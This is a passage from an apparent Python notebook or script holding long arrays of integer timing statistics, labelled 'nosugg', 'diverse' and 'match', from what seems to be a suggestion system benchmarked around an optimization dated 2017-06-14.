118,141,128,246,149,274,113,217,117,240,350,114,159,143,132,278,103,210,108,298,206,123,234,190,143,160,44,382,131,300,178,372,199,209,345,199,164,353,603,26,138,104,192,341,221,118,229,143,137,134,254,129,239,51,133,162,177,156,292,132,251,45,60,93,227,109,172,34,68,113,222,27,122,31,70,41,117,253,36,59,207,134,244,342,287,330,122,241,29,104,29,60,96,198,75,92,285,160,102,205,95,71,175,26,112,101,266,170,185,327,484,270,446,98,187,129,225,102,193,146,300,157,102,197,290,189,104,142,102,208,103,126,230,163,263,126,240,129,224,128,90,191,159,113,227,135,149,122,257,102,180,124,172,304,422,456,134,224,28,160,175,109,220,129,173,177,228,282,47,194,123,276,120,85,239,123,214,144,250,101,28,162,97,221,143,363,263,227,315,631,442,258,141,259,253,329,401,593,159,107,297,174,117,138,28,47,104,199,116,240,156,190,323,320,258,124,24,57,119,266,342,136,246,166,153,300,576,804,42,52,133,236,203,95,325,241,100,36,112,133,220,100,213,125,285,215,56,254,343,250,231,100,192,113,202,110,221,123,175,76,194,156,290,110,133,137,244,212,484,127,336,172,133,250,244,234,364,176,22,42,47,141,136,161,115,216,156,256,114,213,97,188,59,197,21,165,261,238,379,144,98,283,183,53,79,114,292,220,134,101,216,106,444,328,240,30,48,256,113,212,221,328,255,475,110,205,102,266,118,213,99,189,117,139,119,213,104,216,135,251,192,76,101,42,61,102,114,259,140,191,87,117,222,125,222,26,46,15,39,124,325,262,101,214,196,362,416,513,217,125,186,88,211,145,273,333,64,172,96,171,104,198,336,158,276,28,124,104,237,113,231,114,213,97,251,156,151,284,127,237,56,273,132,331,349,170,124,301,118,214,148,38,245,127,256,100,202,125,231,126,216,330,131,224,63,107,104,70,92,103,104,198,85,180,83,79,105,127,220,201,214,261,226,270,100,218,259,152,90,185,224,219,152,295,51,96,226,236,330,323,152,446,345,293,169,269,163,264,239,357,191,409,214,269,166,269,121,58,154,181,239,225,318,335,275,333,472,184,247,115,159,207,253,91,233,214,301,128,317,194,107,128,132,148,36,127,32,131,250,98,121,137,271,219,67,43,172,173,291,208,164,305,169,209,39,185,125,110,310,182,151,114,224,142,253,142,131,253,112,285,28,216,172,149,289,152,38,242,186,130,237,141,266,101,138,105,214,307,168,199,25,53,181,266,145,281,102,231,113,97,204,72,128,95,270,84,104,200,186,302,336,444,96,63,207,109,203,99,242,260,38,120,125,231,104,198,119,267,36,211,173,140,234,55,159,232,53,79,125,254,120,153,195,250,221,108,237,145,235,93,138,267,28,26,46,65,161,130,260,109,97,258,98,233,178,114,220,54,66,31,139,104,211,132,228,39,126,276,120,129,122,222,208,227,351,360,219,184,164,338,344,116,216,175,294,96,290,150,372,466,124,168,52,255,157,199,188,234,191,142,245,148,27,115,131,129,146,239,240,168,197,99,276,109,207,116,173,238,284,112,114,131,169,105,203,178,272,124,196,323,257,85,82,115,216,143,134,184,137,279,193,238,140,342,165,134,271,146,276,186,232,55,52,188,381,208,184,119,164,133,189,236,91,184,105,250,133,157,240,188,233,132,129,101,198,180,277,81,62,200,80,125,106,212,114,246,104,302,105,239,70,65,162,307,147,219,252,111,159,51,197,227,272,93,139,194,290,162,300,317,387,138,223,183,282,109,314,175,139,165,223,98,194,188,232,104,206,99,293,193,99,289,229,246,476,343,145,294,245,229,276,110,265,109,234,170,172,297,105,202,161,45,66,98,158,197,332,25,43,56,75,105,202,105,133,246,28,151,81,176,296,136,161,6,25,96,208,114,219,42,41,68,118,215,113,140,107,316,209,137,232,20,128,96,197,53,170,105,41,59,271,310,229,143,362,99,290,168,128,223,36,200,176,353,122,270,117,227,291,200,307,123,223,110,156,296,134,232,116,218,88,192,131,256,47,95,188,122,193,313,343,115,374,170,127,376,257,193,101,202,99,334,202,243,260,101,187,22,122,103,219,19,134,237,147,284,133,232,118,251,99,256,355,101,184,26,145,130,100,194,6,4,58,75,30,102,231,160,229,7,24,79,116,217,43,42,166,311,21,60,101,202,121,172,325,409,96,189,113,204,130,130,222,147,105,203,189,234,104,300,194,137,338,151,205,248,247,44,88,205,188,234,109,206,118,212,88,142,59,59,223,259,110,206,38,38,150,195,125,112,220,222,268,183,123,89,260,203,249,159,203,109,206,118,212,170,261,72,70,176,267,120,261,123,142,139,127,322,341,242,390,232,276,130,274,167,312,187,277,107,152,152,54,160,196,241,104,297,208,230,106,184,87,124,168,164,141,216,261,175,229,181,416,375,244,223,172,317,250,301,117,213,220,264,150,182,151,252,206,175,118,254,86,119,169,64,162,157,202,130,268,315,291,361,227,226,259,106,241,78,59,55,62,58,214,106,226,84,214,110,217,109,237,136,227,188,225,169,169,205,303,323,179,128,191,68,121,223,226,75,79,151,200,199,106,114,106,267,194,225,195,107,83,168,182,202,115,260,187,203,209,115,255,294,50,237,267,184,23,21,179,229,197,230,433,165,129,287]} ''' #%% # optimized 2017-06-14 stats = ''' {"numInflight":0,"nosugg":[187,22,51,25,35,31,46,112,62,19,58,59,18,40,54,149,36,44,46,77,59,212,19,29,32,54,103,47,122,19,35,27,35,197,41,13,29,26,46,72,35,86,36,53,55,25,55,30,64,169,598,73,41,51,19,55,19,40,46,65,17,28,17,28,21,65,211,25,17,26,37,40,25,76,25,42,20,34,50,65,18,31,33,82,68,38,54,58,20,34,18,31,54,18,37,19,37,22,37,40,67,41,60,43,54,18,47,21,33,22,37,51,20,37,87,21,33,32,36,84,29,40,212,32,42,20,35,21,34,37,53,44,37,13,10,3,3,2,3,3,42,55,20,54,59,33,64,29,45,4,38,67,25,110,36,48,35,21,50,28,43,25,24,39,65,5,27,134,109,35,60,40,51,76,33,106,39,76,50,114,48,53,133,162,28,34,23,38,21,45,110,22,56,35,22,61,12,7,21,36,16,31,20,17,7,21,26,57,33,45,3,35,46,20,34,30,40,22,50,22,47,57,68,29,53,44,33,42,21,40,33,30,66,21,30,23,36,20,30,22,39,51,27,39,40,37,66,37,31,42,38,35,44,58,78,24,43,18,33,63,19,43,34,37,18,47,26,61,36,52,24,49,73,84,19,30,20,50,36,27,56,56,55,20,32,32,45,21,17,4,2,17,30,39,56,58,110,34,47,24,48,17,28,21,34,31,51,21,42,28,41,20,32,49,25,39,14,23,16,33,45,188,46,45,37,51,29,45,21,53,30,31,43,19,43,18,33,19,31,25,38,37,34,21,35,50,36,51,122,19,29,20,47,82,41,53,71,63,74,19,38,24,52,21,34,21,31,31,47,21,33,19,32,81,37,50,44,59,37,66,42,27,42,57,17,29,25,112,169,4,22,38,23,41,29,48,43,21,39,53,38,53,35,41,33,27,43,18,28,39,75,24,42,68,20,35,33,47,37,29,55,28,42,51,47,87,38,50,21,36,49,70,30,70,117,32,70,33,55,35,40,17,40,41,19,32,20,47,38,51,34,53,22,62,17,33,40,39,61,22,42,71,40,64,18,30,61,43,126,28,42,21,66,5,20,17,30,42,15,31,40,36,116,30,44,24,52,18,38,43,41,52,68,22,36,20,31,98,31,47,50,45,41,19,49,18,35,24,58,33,51,51,64,25,3,3,2,3,2,18,30,23,56,46,110,30,55,17,37,31,46,20,32,19,33,20,37,30,42,55,26,41,24,23,44,44,21,18,24,40,29,41,31,32,33,46,33,52,34,44,39,50,129,143,35,50,111,22,40,37,145,27,43,59,83,77,45,67,46,26,40,19,29,55,21,49,3,23,55,46,25,84,14,24,25,37,32,48,22,39,22,55,38,20,32,39,59,24,37,22,54,28,57,27,40,26,51,25,38,27,67,24,35,27,38,40,57,32,58,23,42,30,23,37,22,19,21,37,28,38,40,48,27,48,35,39,25,44,27,41,53,34,50,62,97,38,33,26,52,38,22,35,25,40,29,40,20,31,31,49,24,36,62,18,49,30,48,23,57,17,47,111,31,45,13,27,20,45,25,39,127,47,59,31,62,35,47,23,45,33,46,46,65,130,21,52,19,34,15,25,81,79,79,20,41,41,39,25,54,41,44,19,32,100,28,77,20,31,41,37,3,2,19,39,117,31,42,26,37,19,40,94,20,41,34,47,32,20,52,24,53,90,19,50,34,32,56,30,80,22,42,21,45,18,32,25,20,48,21,52,36,55,36,48,33,43,29,44,18,30,78,29,48,27,26,50,44,56,74,33,20,31,48,64,21,46,95,25,41,73,22,38,63,36,21,32,64,78,37,52,27,38,4,3,2,19,59,27,46,29,49,17,30,20,41,22,42,42,60,34,84,33,60,36,21,59,27,57,30,43,42,38,19,38,127,21,53,56,21,46,34,37,37,44,58,22,36,27,39,20,31,44,52,38,39,34,45,23,42,34,61,54,40,52,48,75,22,47,48,46,19,30,17,29,39,30,43,19,39,39,38,36,59,22,37,21,35,73,117,115,19,35,33,45,36,90,27,28,41,75,27,52,26,46,46,26,39,31,68,38,72,88,22,34,35,51,29,39,47,104,30,55,115,98,14,30,27,39,20,34,18,29,22,37,23,49,18,29,20,47,28,43,34,36,26,45,30,46,49,21,47,62,21,51,31,53,74,91,20,56,59,129,75,35,50,61,110,81,137,46,77,41,22,49,113,38,52,46,76,20,15,37,50,37,53,22,42,125,40,39,66,39,61,30,47,22,34,21,38,59,50,61,33,55,28,48,31,62,23,43,19,33,22,36,20,48,18,32,31,44,20,37,38,47,40,68,29,53,65,33,65,28,61,25,35,20,75,18,41,47,77,102,35,50,46,46,26,35,57,34,47,56,68,122,35,109,83,76,52,21,36,16,47,25,37,24,63,35,50,37,38,20,39,21,34,23,44,20,33,20,40,20,38,19,33,33,51,28,34,45,34,47,139,29,48,21,54,33,43,42,69,20,29,22,33,36,52,19,33,22,33,15,27,57,28,42,32,57,50,74,406,54,40,69,18,38,40,59,20,34,22,34,24,55,23,54,28,30,46,62,20,43,39,41,21,108,23,42,82,81,26,46,18,30,27,40,60,35,49,21,56,44,23,60,27,38,28,47,26,43,50,73,27,40,30,43,24,35,57,42,28,44,18,32,21,41,62,22,34,18,47,39,38,61,33,19,46,37,38,54,27,39,50,22,41,31,20,60,66,21,36,30,52,81,57,24,21,40,19,30,43,96,39,43,42,43,41,21,32,46,57,52,48,20,50,39,47,36,29,45,27,38,37,50,20,37,25,37,23,38,23,56,5,3,27,25,38,47,20,49,11,23,37,50,68,19,40,16,27,25,39,20,45,26,49,38,51,38,35,21,33,18,14,29,39,25,41,19,35,18,32,24,37,42,65,21,36,4,25,39,39,35,41,5,81,49,39,58,29,48,48,31,23,99,74,26,39,83,59,77,25,40,23,39,35,50,35,50,39,54,33,43,20,42,34,53,29,53,72,241,28,45,22,39,30,38,56,36,49,33,65,21,37,38,18,39,35,52,27,47,21,40,19,31,30,30,42,21,35,49,23,42,21,25,37,34,48,29,39,20,46,35,37,37,47,46,45,22,34,38,43,35,118,142,20,31,41,37,36,40,52,23,42,21,54,23,35,40,61,35,41,21,49,24,35,22,33,3,33,46,20,31,26,56,97,21,50,20,46,46,71,71,33,47,30,44,26,28,39,25,42,40,57,29,43,68,31,28,56,25,38,23,53,19,37,36,35,64,38,50,51,50,40,216,98,24,56,25,40,41,57,31,41,21,33,101,25,41,21,40,30,49,16,29,25,82,33,61,22,43,104,20,34,38,66,37,30,62,31,31,68,27,46,33,46,39,59,19,64,38,18,27,32,45,26,44,84,43,46,47,133,54,28,49,33,46,27,42,40,36,35,49,29,45,40,63,29,38,65,22,35,24,36,21,41,40,28,44,58,5,33,55,31,47,21,57,30,43,21,33,51,20,36,19,37,52,26,20,35,48,62,56,70,21,38,30,41,44,48,19,32,20,31,41,59,18,45,35,47,40,37,40,27,22,34,26,49,35,34,26,54,19,36,123,19,43,57,56,121,21,37,20,36,21,33,32,30,20,33,23,36,25,38,29,42,23,44,3,3,3,3,38,102,22,41,19,51,33,46,30,37,28,40,18,39,34,55,40,41,29,41,5,53,61,49,39,30,61,22,19,50,63,26,43,39,21,43,26,53,74,113,46,23,37,43,21,44,20,41,61,78,19,34,24,47,20,35,24,38,104,26,64,31,52,28,27,61,84,78,31,29,58,73,28,46,46,165,75,52,24,37,25,37,19,46,163,53,43,48,35,38,36,42,51,54,41,51,59,31,43,31,43,34,51,39,54,22,42,15,31,51,43,57,22,36,19,31,22,41,21,39,19,40,40,66,79,39,30,60,30,51,36,18,21,35,36,17,53,19,23,36,71,41,42,34,45,36,53,87,89,22,56,24,37,27,25,39,34,78,25,58,25,47,47,31,47,23,34,39,139,53,24,56,30,49,40,31,44,36,56,63,37,36,48,27,24,75,125,25,27,40,23,35,40,66,44,44,35,37,71,34,129,22,36,20,37,126,24,40,30,79,32,48,89,76,18,38,65,69,19,32,21,35,72,38,19,44,58,65,52,65,37,115,59,58,41,53,19,35,56,34,44,166,51,21,37,26,39,50,64,22,41,28,32,29,21,51,19,16,24,52,21,33,56,23,48,22,38,95,30,21,57,23,34,29,44,32,44,24,33,49,18,32,45,59,21,42,22,33,25,41,38,51,24,40,64,21,35,23,37,30,49,45,56,36,59,61,27,44,46,111,37,47,31,43,23,39,36,39,21,50,21,42,25,40,46,24,40,31,49,18,35,21,32,110,26,44,36,52,32,43,31,24,56,33,58,121,94,41,52,35,49,32,47,30,46,31,49,22,54,33,38,35,23,44,20,38,35,49,49,25,21,40,37,50,27,52,39,51,38,49,30,44,31,103,21,51,27,38,24,41,21,18,24,56,109,5,4,25,38,55,97,40,32,78,66,20,36,23,35,34,31,3,2,2,3,2,2,3,2,2,2,20,49,40,59,50,56,45,37,70,35,86,24,69,34,50,41,67,47,40,101,21,42,20,35,27,39,23,41,23,35,28,45,189,29,37,30,47,26,49,65,25,41,49,97,26,36,21,39,25,42,33,42,36,54,25,40,44,91,30,54,25,41,25,31,50,21,57,32,58,24,45,78,22,50,20,32,43,40,29,46,37,51,54,27,33,52,18,28,44,67,34,42,95,27,29,37,26,48,26,39,20,32,58,21,31,25,49,54,23,34,34,44,19,46,23,35,130,136,36,70,20,38,35,17,31,22,36,23,41,45,66,35,72,36,122,118,26,52,22,59,28,58,26,47,40,109,64,40,37,57,58,139,37,52,54,73,20,41,89,132,37,21,37],"diverse":[240,329,97,216,94,204,125,189,101,139,110,217,213,122,246,268,140,132,235,181,94,116,96,199,140,139,105,240,143,22,134,33,271,215,611,225,122,233,107,229,116,268,124,130,85,84,75,114,203,247,50,132,262,132,213,25,64,88,252,226,348,145,5,221,469,181,169,132,263,198,347,163,327,328,286,129,133,287,128,52,147,85,256,166,278,159,159,310,216,308,158,149,136,306,123,13,12,146,110,169,152,43,41,80,137,323,119,119,44,333,157,156,111,244,135,44,58,167,187,211,207,343,120,155,116,424,141,624,102,225,136,262,130,339,128,151,227,115,132,109,202,308,171,103,204,98,169,65,116,24,23,114,112,213,4,67,164,102,204,107,215,97,195,171,130,102,278,172,113,276,47,59,107,195,43,135,114,202,188,6,4,26,24,137,92,144,146,115,217,167,94,189,129,174,128,248,31,131,6,184,181,272,121,100,196,199,126,228,207,255,348,190,330,116,148,289,180,307,63,159,183,277,220,178,320,108,317,99,194,113,213,100,196,105,101,24,122,108,176,269,63,96,212,323,112,194,26,143,40,85,100,26,122,80,104,288,67,98,40,81,109,204,104,175,188,122,30,60,107,196,99,204,199,174,176,198,302,43,58,150,97,201,204,85,157,168,398,193,144,56,86,142,98,230,103,313,116,213,171,205,334,112,207,100,194,23,47,133,157,142,95,199,117,150,113,220,115,208,27,151,119,202,111,95,214,39,120,86,166,100,204,289,73,171,136,286,109,176,98,101,183,102,141,141,254,111,229,96,194,136,286,65,145,100,219,117,308,417,144,102,138,97,197,49,208,318,39,127,104,126,112,222,21,48,108,247,100,219,82,186,97,126,201,33,69,117,7,6,75,93,9,92,212,110,211,76,7,118,6,33,28,57,104,202,22,119,101,203,39,143,235,121,274,107,137,101,206,123,203,417,98,203,209,268,443,314,116,193,150,107,210,39,138,108,103,231,132,154,91,97,222,110,211,91,192,6,29,29,254,260,7,94,29,125,88,205,215,123,223,90,183,123,220,86,217,116,107,211,111,244,328,115,241,127,230,189,96,197,118,321,182,145,406,53,155,222,97,190,91,282,144,337,188,106,210,49,89,46,137,87,181,50,151,168,186,508,425,130,200,63,113,107,211,168,179,284,175,186,117,227,368,328,137,254,98,205,104,304,5,5,131,239,6,23,166,75,102,101,278,363,73,178,122,218,108,233,90,105,142,7,21,96,193,53,110,218,113,193,29,121,248,125,100,222,116,215,120,293,191,301,119,232,122,156,30,176,282,245,20,6,33,121,250,131,220,327,149,273,396,276,204,104,238,112,233,53,151,226,121,189,102,214,34,75,121,228,148,261,44,79,100,182,221,14,103,221,99,202,130,107,202,157,53,151,92,124,201,210,106,195,109,164,106,155,101,223,110,203,232,23,62,103,213,111,206,68,82,27,45,187,109,217,102,120,134,265,147,106,200,105,333,96,270,103,259,221,420,104,228,115,219,6,6,28,27,109,12,121,135,205,59,158,191,25,25,117,149,26,126,195,135,391,118,230,133,267,37,133,102,320,149,230,210,245,356,434,117,126,128,72,105,94,197,148,107,239,145,315,143,29,125,108,95,120,105,198,121,234,111,149,150,100,203,6,85,26,122,101,209,94,202,69,85,27,96,26,137,115,226,119,98,183,113,219,110,223,38,179,43,82,101,26,48,121,102,207,131,223,7,110,140,214,105,189,127,229,129,47,45,6,5,103,156,7,111,158,186,349,301,137,277,196,107,217,8,104,36,13,12,100,136,153,166,99,148,58,94,40,105,106,211,103,223,204,113,228,110,218,120,111,108,133,104,216,115,327,156,140,328,51,85,84,132,23,185,42,77,99,168,99,230,108,210,210,370,103,212,141,113,109,102,207,139,182,118,246,118,258,165,631,103,102,99,220,125,247,110,224,100,197,131,237,155,119,100,211,122,219,192,224,312,99,190,105,222,47,169,165,100,157,188,309,103,226,100,198,194,292,48,69,104,204,238,41,131,112,212,34,50,45,74,132,39,39,33,52,99,247,125,90,176,103,204,135,238,128,225,120,222,128,220,31,46,27,55,23,43,94,200,113,219,120,223,109,312,97,207,131,104,134,90,138,224,106,106,99,201,23,103,137,174,32,133,62,181,276,123,242,103,208,101,220,125,267,99,114,219,106,133,28,116,33,56,101,216,98,211,70,179,107,102,108,108,154,7,8,19,105,34,135,97,194,101,170,51,107,119,121,235,124,237,114,212,103,228,121,164,235,438,107,209,104,197,40,68,36,62,195,28,64,27,45,127,258,119,239,101,209,77,111,139,108,232,162,5,28,113,224,102,208,210,229,349,92,198,139,239,100,206,140,233,99,215,128,242,120,118,119,192,186,229,66,45,64,110,225,154,108,105,220,108,213,93,191,101,205,95,274,182,118,120,101,201,112,222,125,121,143,102,118,100,207,96,89,229,96,216,122,230,98,210,123,235,107,216,125,234,129,225,26,24,99,199,132,231,102,216,86,216,99,134,27,23,115,155,107,239,170,33,59,127,241,159,40,40,110,207,23,111,139,228,114,218,105,207,114,24,115,113,222,117,231,165,111,216,98,196,234,205,345,116,354,104,227,109,213,25,228,145,114,231,113,290,216,148,23,43,120,231,25,41,131,223,126,126,115,228,72,121,153,22,39,51,68,96,208,101,211,113,254,116,218,138,226,114,230,201,171,55,149,157,109,109,32,135,125,26,212,231,130,231,95,270,106,218,112,121,99,200,108,107,146,233,246,315,159,7,25,141,262,104,18,310,340,105,291,216,100,153,124,240,118,207,105,205,112,167,153,42,80,128,263,161,60,146,142,122,28,34,59,95,233,131,104,211,93,116,90,15,194,48,150,6,122,304,207,134,222,125,246,18,6,5,32,52,109,213,154,127,112,223,114,233,4,122,232,162,69,109,225,63,168,102,187,21,113,109,318,99,242,106,227,125,148,97,200,117,295,196,102,242,137,121,183,38,128,92,197,109,295,166,114,248,104,207,134,234,102,344,125,186,138,28,143,78,123,112,214,97,201,179,317,280,331,133,234,69,104,115,322,169,128,65,265,107,228,35,161,225,65,170,97,157,221,108,223,115,217,104,230,179,126,353,192,122,80,127,141,310,107,49,151,183,209,125,213,46,175,296,115,221,98,196,101,206,112,311,134,143,270,84,25,136,113,174,93,130,327,182,26,110,216,81,180,124,229,138,182,188,296,119,172,131,245,134,231,58,107,214,108,191,127,267,109,238,132,354,350,351,490,6,97,7,37,107,230,54,136,140,241,135,121,238,247,119,126,96,307,174,226,177,101,207,131,42,44,103,140,98,208,121,229,66,122,105,127,124,245,18,17,96,183,67,203,158,118,225,7,6,196,187,302,113,236,96,210,102,203,84,170,6,26,99,210,108,239,108,108,138,142,269,159,111,220,96,225,105,187,78,76,7,6,108,216,67,203,312,336,80,111,84,142,72,93,95,204,36,155,122,38,137,47,93,96,124,104,319,194,54,78,116,220,31,116,210,27,108,108,199,110,234,175,212,331,117,228,105,209,102,209,52,77,99,245,113,312,178,111,225,26,150,107,190,102,211,65,124,112,239,109,146,194,161,42,86,46,157,108,224,41,99,208,104,225,341,52,60,22,116,159,247,104,166,181,176,122,406,196,116,217,109,224,224,351,134,235,24,46,97,207,270,152,142,263,127,181,310,136,243,116,213,114,200,106,255,219,188,299,121,291,238,165,286,173,126,276,386,155,304,8,176,172,173,181,200,142,222,211,154,285,106,254,380,122,167,156,270,5,27,138],"match":[232,187,289,95,196,151,409,236,186,228,315,485,326,157,98,222,92,208,95,284,114,111,6,4,132,259,100,213,216,104,196,108,131,99,282,132,311,183,102,240,24,58,118,310,226,217,419,241,176,296,107,203,96,196,130,230,110,223,306,99,202,121,178,99,213,100,168,280,104,208,99,191,201,204,295,123,222,126,232,129,243,143,154,345,118,250,142,281,502,195,129,246,304,241,302,344,508,129,238,114,247,41,144,134,245,115,112,220,116,218,111,140,237,101,217,218,172,316,99,213,116,225,129,304,161,331,228,45,146,41,151,63,127,45,156,112,335,154,41,101,207,135,257,307,297,436,53,56,39,147,108,253,37,53,115,265,227,126,333,165,120,262,84,137,378,113,227,88,173,109,241,35,141,60,72,217,198,329,18,129,167,87,214,127,398,241,278,20,37,228,128,226,100,240,124,301,424,125,460,288,112,100,285,209,99,186,107,189,126,266,104,196,177,107,214,343,107,244,233,248,284,125,262,177,215,285,116,477,132,588,447,151,276,99,249,137,246,162,269,118,159,171,51,166,100,209,116,243,137,73,198,240,436,115,313,187,192,173,316,124,204,158,292,145,186,142,351,184,124,226,29,65,120,260,374,259,115,219,135,216,96,116,187,303,29,23,131,120,289,90,91,113,247,152,168,290,322,143,306,36,701,666,178,488,145,288,171,335,211,143,326,114,238,267,153,316,144,257,128,246,199,16,13,93,143,143,133,271,128,328,224,220,247,368,298,166,416,193,540,27,59,36,217,450,113,198,35,48,196,74,213,261,298,448,156,183,25,346,270,219,82,192,34,127,100,704,138,346,193,159,153,320,159,265,121,240,189,190,330,110,125,246,215,206,446,215,182,115,219,96,268,164,341,176,127,359,242,109,97,141,112,109,218,104,180,96,124,43,135,76,168,89,180,106,189,30,63,171,194,289,150,212,305,268,106,198,102,200,104,201,27,110,209,73,162,114,147,119,217,108,203,107,269,152,114,186,100,154,98,217,47,54,33,152,139,144,113,251,33,137,125,217,170,290,112,235,287,109,130,92,157,22,48,96,188,29,53,31,125,192,319,100,269,209,204,112,105,197,97,189,100,217,113,261,111,204,156,128,329,176,100,263,142,174,99,192,94,195,131,209,282,108,277,99,198,97,195,116,226,196,183,115,209,6,110,72,64,65,93,151,104,191,98,289,58,54,140,124,222,22,56,27,198,144,61,112,263,25,115,96,194,108,201,165,136,269,106,204,106,206,87,174,40,201,163,96,182,107,223,109,104,204,109,204,57,229,199,251,196,163,101,195,111,80,210,255,303,298,434,27,25,207,307,74,122,232,98,223,28,53,99,195,110,127,204,111,269,155,38,143,202,190,95,191,102,200,145,45,196,177,110,96,183,170,130,282,98,115,114,206,113,205,191,36,144,120,149,245,176,183,275,156,170,272,110,157,137,123,217,95,188,162,100,191,44,130,113,209,157,104,217,68,111,98,194,84,206,92,120,93,209,25,109,32,50,136,59,314,181,195,220,112,204,100,194,66,134,129,220,105,201,182,170,317,90,110,202,45,64,113,207,79,118,55,160,160,211,112,212,138,108,148,281,103,141,100,292,148,99,267,142,149,95,292,153,169,137,290,103,125,8,39,190,169,265,115,207,110,187,46,77,96,188,182,134,291,217,99,198,190,94,155,106,210,313,52,111,63,169,104,126,101,200,126,316,234,33,36,150,108,131,97,212,146,126,215,102,210,44,125,124,266,177,28,91,154,104,205,104,112,99,265,108,109,208,132,232,122,159,29,68,25,39,91,188,163,110,266,157,178,176,372,134,6,40,115,222,63,162,101,215,260,281,157,103,217,32,120,221,223,321,97,196,99,204,124,228,119,230,54,96,162,165,183,107,195,291,101,155,267,126,218,110,226,120,114,305,164,123,203,305,110,233,208,158,332,114,188,24,123,138,126,219,128,53,132,104,206,106,306,219,108,303,100,210,126,102,247,126,107,119,119,226,197,113,213,107,207,105,29,47,90,210,203,193,173,293,7,105,126,275,103,202,115,225,8,105,179,307,448,282,154,146,273,105,218,70,180,88,123,220,100,207,123,143,111,215,195,152,215,24,129,26,43,107,130,97,31,65,102,217,329,120,235,108,152,40,58,6,85,126,245,94,112,120,113,226,52,107,221,98,200,35,134,127,108,211,118,212,115,214,286,453,102,226,133,103,197,109,126,86,235,147,104,210,112,296,248,231,222,103,203,217,166,324,136,113,213,102,198,92,202,252,106,204,123,92,150,46,142,254,111,210,215,322,9,56,109,204,94,193,100,196,142,5,56,26,148,43,63,27,45,105,205,110,101,200,42,60,108,374,356,359,312,118,220,111,308,103,250,130,111,109,207,98,139,95,202,117,210,105,198,74,91,194,100,173,70,97,219,89,194,110,217,91,198,100,287,179,25,39,18,246,204,149,42,129,330,194,103,217,130,238,108,213,114,227,174,105,164,129,378,277,308,226,322,63,195,132,245,111,193,295,133,228,100,196,114,217,104,242,7,6,85,199,136,70,135,326,120,98,191,55,146,124,231,98,200,152,122,200,317,28,117,288,220,46,168,130,236,107,234,402,101,223,97,211,97,304,113,149,96,81,186,104,154,46,80,205,49,326,9,44,120,102,221,93,142,23,53,103,192,131,232,46,155,113,260,106,94,214,251,102,213,107,228,144,45,179,96,46,140,104,204,130,245,231,268,124,247,99,199,103,206,31,29,104,208,46,153,106,283,187,98,126,186,234,74,123,107,228,162,165,107,215,96,210,111,234,104,206,284,99,202,19,19,13,11,98,201,194,299,198,168,328,88,100,305,111,230,106,212,294,113,221,205,171,110,207,105,198,89,175,117,92,192,138,296,94,189,171,182,191,181,298,127,229,233,261,100,205,121,230,109,224,322,63,83,99,208,39,61,55,52,101,259,180,356,318,55,54,49,86,34,39,89,184,39,150,103,204,117,198,85,102,129,95,95,229,141,329,341,69,75,107,223,93,193,25,123,32,53,180,228,174,179,294,87,206,71,156,216,47,91,195,96,204,107,201,118,216,50,114,240,268,361,275,530,92,88,120,6,38,19,125,27,54,196,146,260,99,196,142,243,155,305,98,227,118,222,116,207,167,223,198,101,203,68,80,34,115,219,105,241,99,157,93,200,211,124,63,46,96,295,185,280,119,237,134,226,114,214,95,270,141,104,216,106,221,179,157,218,95,191,36,149,96,191,104,166,64,218,233,124,215,28,122,111,202,117,213,83,170,77,167,118,208,121,115,123,219,190,230,305,214,163,198,217,78,116,25,86,149,56,176,110,220,73,168,95,206,209,186,261,93,218,103,198,102,202,100,135,109,208,117,125,201,174,94,194,134,230,100,27,66,176,100,142,122,256,176,167,331,155,465,237,238,374,114,285,129,287,145,275,125,189,118,256,94,117,310,44,137,254,100,193,58,160,33,46,110,108,120,12,228,115,205,159,122,301,208,63,83,6,28,96,190,235,178,104,211,96,204,21,37,115,215,27,51,91,125,314,160,95,225,98,133,109,223,187,36,132,171,183,303,103,217,137,196,105,298,56,144,105,198,105,259,178,113,273,109,208,53,61,41,72,166,209,27,117,180,84,136,42,75,6,5,124,228,33,86,6,46,139,96,126,185,262,220,22,20,108,5,6,5,7,7,140,197,311,75,114,238,102,245,41,64,76,124,225,25,132,139,249,273,172,86,118,129,250,73,99,196,96,189,123,225,212,299,99,119,72,299,118,258,23,111,105,210,119,212,180,132,238,98,193,118,190,99,199,104,207,110,22,20,24,22,80,121,95,124,23,58,47,171,134,14,12,37,142,159,70,71,165,8,7,144,267,129,232,5,4,131,316,97,199,4,21,21,103,102,44,175,106,108,198,151,317,110,175,104,139,5,4,4,5,105,121,214,121,232,243,98,210,120,90,172,57,126,103,204,95,195,142,162,258,100,217,99,209,103,104,200,97,201,36,55,95,202,39,134,97,210,117,92,297,132,238,147,147,21,35,133,119,244,108,186,279,103,229,152,137,276,108,203,96,147,22,39,90,257,110,217,43,52,102,137,261,134,242,113,242,110,145,151,133,257,73,220,295,150,290,141,208,132,252,124,218,407,374,99,280,208,31,147,124,277,117,121,217,164,113,217,106,164,26,190,84,103,96,207,111,219,104,207,124,230,69,107,294,135,94,119,44,138,40,47,131,123,234,142,216,88,193,111,234,99,196,75,86,67,118,116,248,127,71,168,86,184,54,145,110,167,111,218,34,63,152,106,204,113,147,100,198,119,222,150,257,183,222,99,210,122,226,192,221,236,42,121,130,294,245,224,238,364,96,179,99,190,96,199,94,183,559,544,771,100,201,130,235,6,5,99,193,7,7,109,124,7,6,127,22,114,214,107,197,136,81,211,93,185,97,205,67,87,114,77,118,41,141,30,51,162,291,42,70,96,197,46,143,203,161,110,110,89,182,103,203,247,32,176,142,154,158,388,150,96,229,107,208,102,171,138,236,109,213,75,171,116,203,113,107,29,125,92,202,113,138,126,104,208,117,8,7,30,46,23,132,105,123,186,7,6,128,6,5,7,7,98,191,6,5,111,207,130,239,44,140,126,180,120,229,31,55,114,300,63,149,92,112,117,265,65,35,129,106,232,102,101,120,216,123,386,176,98,205,112,209,97,198,104,155,115,40,124,187,295,111,223,110,233,104,300,146,115,223,42,58,93,194,24,108,239,7,7,103,210,112,203,7,7,80,189,5,122,103,156,107,205,127,234,116,225,219,347,127,185,46,107,211,170,327,116,232,68,44,136,124,218,126,145,252,109,223,120,237,113,218,101,199,122,223,54,87,119,5,41,67,90,92,178,283,118,230,108,183,104,200,118,180,57,78,42,129,113,210,88,194,157,101,210,82,59,161,155,255,146,110,140,29,128,113,217,116,248,150,107,209,103,221,125,218,29,53,37,61,120,248,104,206,79,186,118,138,259,184,207,39,72,101,222,112,235,113,270,161,109,218,270,112,170,130,97,219,98,235,100,209,184,109,27,233,29,135,112,103,197,99,203,64,169,52,110,208,86,188,201,65,129,56,195,115,232,242,95,197,130,6,108,213,185,161,92,200,184,323,129,222,217,88,191,149,172,73,172,131,99,205,104,199,363,97,220,39,74,39,43,102,204,26,125,118,263,232,370,40,37,5,4,4,4,5,4,4,3,3,3,3,110,237,172,31